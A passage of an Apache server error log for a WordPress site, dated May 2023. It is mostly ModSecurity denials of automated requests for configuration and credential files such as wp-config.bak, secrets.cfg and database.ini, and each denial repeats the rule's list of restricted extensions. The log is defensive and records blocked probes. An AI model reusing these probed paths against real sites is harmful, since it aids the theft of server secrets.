"WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/credentials.cfg"] [unique_id "ZHIAy6seEgYlJ2mSC22C4wAAAMk"] [Sat May 27 08:08:27.762668 2023] [:error] [pid 19345:tid 140152338446080] [client 44.204.213.38:60402] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.cfg"] [unique_id "ZHIAy6seEgYlJ2mSC22C5AAAAME"] [Sat May 27 09:47:12.797339 2023] [ssl:warn] [pid 18649:tid 140152527460224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:01:55.043849 2023] [ssl:warn] [pid 15067:tid 140619416188800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:01:55.211358 2023] [ssl:warn] [pid 15068:tid 140619416188800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:06:37.996927 2023] [ssl:warn] [pid 16502:tid 139677575456640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:06:38.129481 2023] [ssl:warn] [pid 16522:tid 139677575456640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:09:19.021619 2023] [ssl:warn] [pid 17329:tid 140156980864896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:09:19.163382 2023] [ssl:warn] [pid 17332:tid 140156980864896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:13:33.982649 2023] [ssl:warn] [pid 18663:tid 140050352609152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:13:34.130678 2023] [ssl:warn] [pid 18664:tid 140050352609152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 10:32:32.237812 2023] [autoindex:error] [pid 18666:tid 140050067080960] [client 101.32.141.172:38114] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 27 10:38:36.031345 2023] [autoindex:error] [pid 18757:tid 140049907619584] [client 43.156.103.178:38340] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 27 15:22:16.541718 2023] [:error] [pid 18667:tid 140050041902848] [client 34.239.112.248:52056] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/php.ini"] [unique_id "ZHJmeMux0BFZ7HuJl6HjyAAAAIc"] [Sat May 27 15:22:34.313886 2023] [:error] [pid 18666:tid 140050033510144] [client 34.239.112.248:52098] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZHJmioqkNe72HXSzB1OuNAAAAEg"] [Sat May 27 15:22:34.657321 2023] [:error] [pid 18666:tid 140050008332032] [client 34.239.112.248:52100] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZHJmioqkNe72HXSzB1OuNQAAAEs"] [Sat May 27 15:24:28.898764 2023] [:error] [pid 18665:tid 140049991546624] [client 34.239.112.248:52410] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/app.conf"] [unique_id "ZHJm_IJb2ZVfsw4YdY3N8AAAAA0"] [Sat May 27 15:24:38.476671 2023] [:error] [pid 18667:tid 140050050295552] [client 34.239.112.248:52438] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/server.cfg"] [unique_id "ZHJnBsux0BFZ7HuJl6Hj4gAAAIY"] [Sat May 27 15:25:09.072131 2023] [:error] [pid 18666:tid 140050050295552] [client 34.239.112.248:52518] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/development.ini"] [unique_id "ZHJnJYqkNe72HXSzB1OucgAAAEY"] [Sat May 27 15:25:13.737122 2023] [:error] [pid 18666:tid 140050033510144] [client 34.239.112.248:52528] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/application.conf"] [unique_id "ZHJnKYqkNe72HXSzB1OudAAAAEg"] [Sat May 27 15:25:25.091747 2023] [:error] [pid 18667:tid 140050058688256] [client 34.239.112.248:52554] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/web.config"] [unique_id "ZHJnNcux0BFZ7HuJl6Hj7AAAAIU"] [Sat May 27 15:25:27.524072 2023] [:error] [pid 18757:tid 140049899226880] [client 34.239.112.248:52560] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/config.ini"] [unique_id "ZHJnN-Sn36pfgtzmI87aqAAAANg"] [Sat May 27 15:25:29.587371 2023] [:error] [pid 18665:tid 140049974761216] [client 34.239.112.248:52566] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/database.ini"] [unique_id "ZHJnOYJb2ZVfsw4YdY3N_QAAAA8"] [Sat May 27 15:25:34.057242 2023] [:error] [pid 18757:tid 140050083866368] [client 34.239.112.248:52586] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/settings.ini"] [unique_id "ZHJnPuSn36pfgtzmI87aqwAAAMI"] [Sat May 27 15:25:36.295109 2023] [:error] [pid 18757:tid 140049957975808] [client 34.239.112.248:52592] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/global.ini"] [unique_id "ZHJnQOSn36pfgtzmI87arQAAANE"] [Sat May 27 15:25:38.509590 2023] [:error] [pid 18757:tid 140050041902848] [client 34.239.112.248:52598] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/local.ini"] [unique_id "ZHJnQuSn36pfgtzmI87asAAAAMc"] [Sat May 27 15:25:41.269055 2023] [:error] [pid 18757:tid 140050016724736] [client 34.239.112.248:52606] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/app.config"] [unique_id "ZHJnReSn36pfgtzmI87aswAAAMo"] [Sat May 27 15:26:06.197401 2023] [:error] [pid 18665:tid 140050008332032] [client 34.239.112.248:52684] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/connectionstrings.ini"] [unique_id "ZHJnXoJb2ZVfsw4YdY3OBQAAAAs"] [Sat May 27 15:26:06.545401 2023] [:error] [pid 18667:tid 140049974761216] [client 34.239.112.248:52686] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/settings.cfg"] [unique_id "ZHJnXsux0BFZ7HuJl6Hj9gAAAI8"] [Sat May 27 15:26:06.986252 2023] [:error] [pid 18665:tid 140050041902848] [client 34.239.112.248:52688] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/secrets.cfg"] [unique_id "ZHJnXoJb2ZVfsw4YdY3OBgAAAAc"] [Sat May 27 15:26:07.333569 2023] [:error] [pid 18757:tid 140049991546624] [client 34.239.112.248:52690] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/credentials.cfg"] [unique_id "ZHJnX-Sn36pfgtzmI87awgAAAM0"] [Sat May 27 15:26:07.670021 2023] [:error] [pid 18667:tid 140049932797696] [client 34.239.112.248:52692] [client 34.239.112.248] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/database.cfg"] [unique_id "ZHJnX8ux0BFZ7HuJl6Hj9wAAAJQ"] [Sat May 27 17:36:29.999018 2023] [autoindex:error] [pid 18757:tid 140049949583104] [client 43.153.101.148:58002] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 27 19:03:32.368944 2023] [ssl:warn] [pid 18664:tid 140050352609152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 28 03:34:19.926598 2023] [ssl:warn] [pid 3183:tid 140141074941824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 28 03:34:20.057817 2023] [ssl:warn] [pid 3184:tid 140141074941824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 28 